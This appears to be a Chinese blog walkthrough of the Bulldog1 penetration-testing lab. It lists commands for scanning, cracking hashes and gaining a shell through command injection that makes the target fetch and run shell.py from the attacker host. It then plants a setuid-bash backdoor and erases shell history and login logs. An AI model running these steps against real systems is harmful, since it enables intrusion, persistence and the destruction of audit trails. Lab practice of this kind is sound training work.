步骤
1.信息收集:ip 端口 服务 操作系统 版本
2.漏洞扫描或漏洞发现:eg:ms17-010
3.漏洞利用:拿到shell
4.提权
5.留后门,清痕迹
6.渗透测试报告

主机发现:
dhclient 动态获取ip
netdiscover -i eth0 -r 192.168.68.0/24
nmap 192.168.68.0/24 -sn

nmap -T4 -sV -O -p 80,23,8080 192.168.68.138 //速度 版本 操作系统 端口 IP

发现有http 所以用浏览器查看主页

dirb http://192.168.68.138 //扫描目录 可以空格+字典名 可以使用大字典 big.txt

dpkg -L dirb 查看相关字典文件

尝试访问/admin

抓包 明文传输 暴力破解第四种方式 失败

/robots.txt //用来存放不会被爬虫的路径,未找到可用信息

访问/dev

f12查看

www.somd5.com 逐一破解
nick—bulldog

sarah—bulldoglover

认证之后可以使用webshell


发现命令执行漏洞:

kali shell脚本

python -m SimpleHTTPServer 80 //用python搭一个web服务 必须在你想要对方wget的文件目录下

ls&wget http://192.168.68.130/shell.py


kali监听nc -vnlp 1234

ls&python shell.py

此时kali拿到shell



用strings命令查看文件,发现其中一串规律的英文字符,获取flag去掉H是“SUPERultimatePASSWORDyouCANTget”意思为“你没有拿到的终端超级密码”,猜测是“bulldogadmin”用户密码:

进入家目录,执行su、sudo操作需要重新打开一个终端:
python -c ‘import pty;pty.spawn("/bin/bash")’

sudo -i:为bulldogadmin用户修改root环境参量(输入bulldogadmin密码):

提权成功

留后门:
创建新用户
打开443端口,kali编写文件suid.py,并上传到靶机上
#!/usr/bin/env python
import os
import sys
try:
os.system(‘chmod u+s /bin/bash’)
except:
sys.exit()

从本地复制到远程
scp local_file remote_username@remote_ip:remote_folder
scp -r suid.py root@192.168.68.138:suid.py // -r递归复制整个目录

清痕迹:
history -c //清除历史信息(上下键)
rm /root/.bash_history //删除文件,让其无法写入记录
/var/log/secure 安全日志
/var/log/faillog 登录失败的日志
echo > /var/log/wtmp 每个用户的登录次数和持续时间等信息
echo > /var/log/btmp 错误登录日志
echo > /var/log/lastlog 最后一次登录日志

白菜新手渗透测试靶机练习bulldog1相关推荐

  1. 渗透测试-靶机打靶思路与方法

    渗透测试-靶机打靶思路与方法 文章目录 渗透测试-靶机打靶思路与方法 一.对靶机进行信息收集 1.首先对目标存活靶机发起嗅探: 2.对目标主机开放端口及服务发起探测 3.对非web端口的服务发起迅速的 ...

  2. 看完这篇 教你玩转渗透测试靶机——Metasploitable2

    Metasploitable2渗透测试详解 Metasploitable2靶机介绍: Metasploitable2靶机下载: Metasploitable2靶机安装: Metasploitable2 ...

  3. 全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(七)IMF【包含了sql注入,文件上传,gif图片木马制作,缓冲区溢出漏洞sploit等诸多知识点的靶机,超多干货】

    靶机地址:https://www.vulnhub.com/entry/imf-1,162/ 靶机难度:中级(CTF) 靶机发布日期:2016年10月30日 靶机描述:欢迎使用" IMF&qu ...

  4. 看完这篇 教你玩转渗透测试靶机vulnhub——DC9

    Vulnhub靶机DC9渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:SQL注入: ③:文件包含: ④: ...

  5. 看完这篇 教你玩转渗透测试靶机vulnhub——DC1

    Vulnhub靶机DC1渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:漏洞发现: ③:漏洞利用: ④:S ...

  6. 看完这篇 教你玩转渗透测试靶机vulnhub——DC3

    Vulnhub靶机DC3渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:漏洞发现: ③:SQL注入: ④: ...

  7. 看完这篇 教你玩转渗透测试靶机vulnhub——DC7

    Vulnhub靶机DC7渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:SSH登入: ③:漏洞发现与利用: ...

  8. 看完这篇 教你玩转渗透测试靶机vulnhub——My File Server: 2

    Vulnhub靶机My File Server: 2渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:FTP ...

  9. 看完这篇 教你玩转渗透测试靶机vulnhub——My File Server: 1

    Vulnhub靶机My File Server: 1渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:FTP ...

最新文章

  1. windows php swoole 安装
  2. php不能加载oci8,无法加载动态库'oci8.so'(PHP 7.2)
  3. 一个简单的登录页面,效果不错哦!
  4. 捡到vivo手机怎么清除账号_大学保安两天两次跳湖为路人捡手机,您怎么看?...
  5. CKEditor4.4.5 插入高度代码及上传图片
  6. 面试题08(C++)
  7. 软件架构设计案例_透过现象看本质:常见的前端架构风格和案例
  8. jQuery源码研究01
  9. Oracle 列转行函数 Listagg()
  10. 怎么更改wifi频段_科普 | 你了解WiFi信号扩展器吗?
  11. Python第三方库使用——splinter
  12. html5文章 -- 应用HTML5 开发手机APP
  13. 3D点云语义分割认知随便写写(更新中)
  14. Atitit python3.0 3.3 3.5 3.6 新特性 Python2.7新特性1Python 3_x 新特性1python3.4新特性1python3.5新特性1值得关注的新特性1Pyth
  15. hdu 5083 Instruction (稍比较复杂的模拟题)
  16. 《微积分的力量》读书摘记
  17. mysql数据库data没有新创建_如何从pandas datafram在MySQL数据库中创建新表
  18. 投影仪为何要测评?原因就是,不当大冤种
  19. 你的Idea还可用吗?不妨试试另一个开发神器!
  20. 10 个有用的 Python 字符串函数你必须知道

热门文章

  1. 数据挖掘 and 生物信息学之旅
  2. JAVA关键字 notice
  3. 【报告分享】2021中国新能源车险生态共建白皮书-艾瑞咨询(附下载)
  4. Unity实现Image图片显示视频 、灵活配置控制视频播放(视频格式为MovieTexture)
  5. currentstyle 织梦_设置typeid后织梦currentstyle 不起作用的修复方法
  6. R语言—mcl运行错误记录
  7. maven自定义目录
  8. 学生党必备的 Keychron 无线机械键盘
  9. 脱水又泼水--远程办公需求分析
  10. “限制20%可保留带宽”是真的吗